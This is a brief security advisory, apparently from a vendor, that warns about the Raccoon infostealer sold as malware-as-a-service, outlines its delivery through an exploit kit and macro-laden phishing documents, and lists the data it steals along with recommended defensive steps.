LTS Secure Warning: Raccoon Infostealer Being Utilized By Hacker To Steal Sensitive Data From Financial Institutions

A new information stealing malware, dubbed Raccoon, has gained a lot of popularity among cybercriminals in a short span. Written in C++ & developed to compromise both 32 & 64-bit operating system, the malware is being sold as a Malware-as-a-Service (MaaS) product by it developers, helping cybercriminals make quick & easy money.

Technical Details

The malware is being delivered using multiple ways such as phishing mails, exploit kits, etc.

The attackers utilize the fallout exploit kit to deliver the raccoon payload on the victim machine. The kit spawns a PowerShell instance from internet explorer (IE), which afterword’s  downloads the infostealer payload.

The phishing mail contains an office document, containing the malicious macro. If the receiver opens the document & allows the macro to run, a connection is established to a malicious server and the main payload is downloaded on the user machine.

Impact

• Collects user & system information.
• Capture cryptowallet credentials.
• Steal sensitive/confidential information like login credentials of banking sites, credit card data, cookies, etc.

Recommended Actions

• Never download any suspicious attachments or click on any shady-looking link. Take an effort to educate your users on how to identify a mal-spam.
• Always update your anti-virus software with the latest releases.
• Periodically run “full system scan” on your endpoints.
• Make proper security configuration for Firewall/IDS/IPS/Endpoint Protection systems so that no holes are left barred.
• Isolate all of the compromised computers ASAP to prevent threats from spreading further inside your infrastructure.